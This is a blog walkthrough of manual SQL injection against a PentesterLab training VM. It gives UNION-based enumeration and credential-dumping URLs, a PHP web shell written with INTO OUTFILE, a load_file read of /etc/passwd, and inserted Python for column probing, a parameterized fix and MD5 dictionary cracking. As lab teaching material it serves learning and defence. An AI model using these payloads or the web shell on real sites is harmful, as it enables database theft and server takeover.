Monday, January 1, 2018

SQL Injection Walkthru (SQLi)

Most SQLi attacks are done using some form of 'hacker' tool; the common ones are sqlmap, sqlninja, bbqsql, etc. While using such tools is important, one must not forget the fundamentals of SQLi. In this post, I will demo the steps of identifying an injection point, enumerating the database and, finally, trying to execute code on the victim server 192.168.52.141. The victim runs a typical MySQL backend with PHP in front of it.

Identifying SQLi

Often we start by inserting a ' into any user input field we can find. If we are lucky, the server displays an error, which means we have broken the SQL statement used to build the results page.


The above diagram displays an SQL error showing 2 single quotes, although we added only 1. This usually means there is already a single quote in the statement; a peek at the backend code looks like:


On line 16, the variables id and title are already wrapped in single quotes, so adding another single quote breaks the statement. This is worth paying attention to, since most SQLi payloads begin with a single quote precisely to close such a string before the rest of the payload. So always read the error message carefully. If you want to know whether a ' is required or not, first try a simple arithmetic expression such as id=2-1: if you get no error and the page shows the same content as id=1, the database evaluated your expression, and you know that SQLi is possible without the single quote (which is the case for the rest of this walkthru) ;-)

Let's proceed with enumeration of the database.

Enumerate SQLi

This is where we must first find out how many columns the query behind the page returns. We do this with a UNION SELECT: the number of columns in our SELECT must match the number in the query used by the page, otherwise MySQL refuses to run the statement ("The used SELECT statements have a different number of columns"). If you use sqlmap, this is what it automates for you :-)

So, by inserting the following statements:

http://192.168.52.141/cat.php?id=2 union select 1
will return an error...

http://192.168.52.141/cat.php?id=2 union select 1,2
will return an error...

http://192.168.52.141/cat.php?id=2 union select 1,2,3
will return an error...




http://192.168.52.141/cat.php?id=2 union select 1,2,3,4
no error is returned; see diagram below:



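To make the identification and column-counting steps concrete, here is an added example (my own code, not from the post or from PentesterLab) that rebuilds the vulnerable pattern of cat.php in Python over an in-memory SQLite database. The schema, rows and table names are constructed stand-ins for the photoblog database; SQLite is used only because it runs offline, and its UNION error text differs from MySQL's. Going beyond the post, it also includes a parameterized version of the lookup that rejects the same probes.

```python
import sqlite3

# Constructed stand-in for the photoblog database on the page: a four-column
# "pictures" table that cat.php selects from, plus the "users" table.
SCHEMA = """
CREATE TABLE pictures (id INTEGER, title TEXT, img TEXT, cat_id INTEGER);
INSERT INTO pictures VALUES (1, 'Ruby', 'ruby.jpg', 1), (2, 'Rails', 'rails.jpg', 1),
                            (3, 'Mysql', 'mysql.jpg', 2);
CREATE TABLE users (id INTEGER, login TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', '8efe310f9ab3efeae8d410a8e0166eb2');
"""


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def cat_php(db, user_id):
    """Mimics the vulnerable cat.php: the id parameter is concatenated into the
    WHERE clause as-is, with no quoting, casting or validation."""
    sql = "SELECT id, title, img, cat_id FROM pictures WHERE cat_id=" + user_id
    return db.execute(sql).fetchall()


def cat_php_safe(db, user_id):
    """Hardened lookup (not on the page): reject anything that is not an integer,
    then bind the value as a parameter so it can never be parsed as SQL."""
    try:
        cat_id = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    sql = "SELECT id, title, img, cat_id FROM pictures WHERE cat_id=?"
    return db.execute(sql, (cat_id,)).fetchall()


def is_numeric_injection(db, n):
    """The id=2-1 test from the post: if id=(N+1)-1 returns the rows for id=N
    rather than for id=N+1, the database evaluated our arithmetic, so the value
    is injected as a bare number and no quote is needed in the payload."""
    probe = cat_php(db, f"{n + 1}-1")
    return probe == cat_php(db, str(n)) and probe != cat_php(db, str(n + 1))


def find_column_count(lookup, db, base_id, max_cols=16):
    """Append UNION SELECT 1 / 1,2 / 1,2,3 ... until the query stops failing; the
    first count that runs cleanly is the width of the original SELECT. Returns
    None if nothing up to max_cols works (or if the lookup rejects the input)."""
    for n in range(1, max_cols + 1):
        placeholders = ",".join(str(i) for i in range(1, n + 1))
        try:
            lookup(db, f"{base_id} union select {placeholders}")
            return n
        except (sqlite3.OperationalError, ValueError):
            # SQLite: "SELECTs to the left and right of UNION do not have the same
            # number of result columns"; MySQL reports the same condition as
            # "The used SELECT statements have a different number of columns".
            continue
    return None


if __name__ == "__main__":
    db = connect()
    print("numeric injection:", is_numeric_injection(db, 1))
    print("columns in the original SELECT:", find_column_count(cat_php, db, 2))
    print("parameterized lookup, same probe:", find_column_count(cat_php_safe, db, 2))
```

Against the vulnerable lookup the probe stops at 4, matching the page; against the parameterized one every payload is refused before it reaches the database, which is the behaviour to aim for in the fix.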
Code Exec

Now we can start rocking! Let's see which version MySQL is running, which database is in use and which account we are connected as. MySQL exposes these through the built-in @@version variable and the database() and current_user() functions, which we place in one of the columns the page actually renders (column 2 here).

 



Looks like it's running Debian Squeeze, now let's see the database name the contents are stored in:





Great! The db name is photoblog. Now, how about the MySQL account the application connects as (current_user() returns the database account, not the OS user mysqld runs under):

From here, we can run SELECT statements of our choosing. The next step is to exfiltrate the contents of the database 'photoblog'. MySQL ships with the information_schema database, whose tables information_schema.tables and information_schema.columns describe every table and column the current account can see:

http://192.168.52.141/cat.php?id=2 union select 1,table_name,3,4 from information_schema.tables
will return the complete list of tables, including those of the photoblog db (information_schema.tables covers every database the account can read, so append where table_schema=database() to restrict the output to the current one without needing a quoted string):


The table 'users' is of particular interest to us :-) Let's see what we can find inside it by displaying the corresponding table_name:column_name pair in each row using this statement:

http://192.168.52.141/cat.php?id=2 union select 1,concat(table_name,':',column_name),3,4 from information_schema.columns

Output:


Scrolling down the displayed output, the most obvious goodies are inside the 'users' table, columns 'login' and 'password'. Let's exfiltrate them using this statement:

http://192.168.52.141/cat.php?id=2 union select 1,concat(login,':',password),3,4 from users


Output:



Now we have exfiltrated the user 'admin' with password hash '8efe310f9ab3efeae8d410a8e0166eb2'. At 32 hex characters this looks like an unsalted MD5. Stick it inside your favourite password cracker and you may recover the admin password!
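As an added example (mine, not from the post) of what that cracker does with the value: guess the algorithm from the digest length, then run a dictionary attack with hashlib. The wordlist below is constructed for the demo and its entries are guesses; nothing here confirms what the real admin password is.

```python
import hashlib

# Constructed wordlist for the demo; a real run uses a large list such as rockyou.txt.
WORDLIST = ["password", "admin", "letmein", "photoblog", "P4ssw0rd"]

# Hex-digest length of common unsalted hashes -> hashlib algorithm name.
ALGORITHM_BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256"}


def digest(algorithm, word):
    """Hex digest of a candidate plaintext under the given algorithm."""
    return hashlib.new(algorithm, word.encode()).hexdigest()


def guess_algorithm(hexdigest):
    """Infer the hash type from its shape alone. The value pulled from the users
    table is 32 hex characters, which points at unsalted MD5 (or at least a
    128-bit digest stored without a salt or prefix)."""
    if not hexdigest or not all(c in "0123456789abcdefABCDEF" for c in hexdigest):
        return None
    return ALGORITHM_BY_LENGTH.get(len(hexdigest))


def crack(hexdigest, wordlist=WORDLIST):
    """Dictionary attack: hash each candidate with the guessed algorithm and return
    the first plaintext whose digest matches, or None if the list is exhausted."""
    algorithm = guess_algorithm(hexdigest)
    if algorithm is None:
        return None
    target = hexdigest.lower()
    for word in wordlist:
        if digest(algorithm, word) == target:
            return word
    return None


if __name__ == "__main__":
    leaked = "8efe310f9ab3efeae8d410a8e0166eb2"  # the admin hash recovered on the page
    print(guess_algorithm(leaked), crack(leaked))
```

If the stored value had a salt or a scheme prefix (for example a $1$ or $2y$ string), guessing by length would be wrong and the per-word cost would be much higher; the 32-hex-character form is exactly what makes this hash cheap to attack.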

There you go folks... tools such as sqlmap can also spawn a shell. On MySQL, what it does is write a PHP file into the web root, containing a simple PHP system() call, using INTO OUTFILE:

http://192.168.52.141/cat.php?id=2 union select 1,"<?php system($_GET['cmd']); ?>",3,4 INTO OUTFILE '/var/www/cmd.php'

Provided the MySQL account ('pentesterlab@localhost' here) holds the FILE privilege and the OS user the mysqld process runs as can write to /var/www/, you should then be able to call the file directly and pass a command, e.g. http://192.168.52.141/cmd.php?cmd=id. A few caveats: INTO OUTFILE refuses to overwrite an existing file, newer MySQL versions restrict the destination directory through secure_file_priv, the PHP string must not contain double quotes (they would terminate the SQL string, which is why $_GET['cmd'] uses single quotes above), and if the application escapes quotes you can hex-encode the whole PHP snippet as a 0x... literal so the payload contains none at all. You can also try load_file('/etc/passwd'), which needs the same FILE privilege; if you are lucky, you should be able to see its contents.

That's pretty much how SQLi is done by hand. Remember, don't be a script kiddie; always understand how your code works!

Kudos, to www.pentesterlab.com for the educational content.
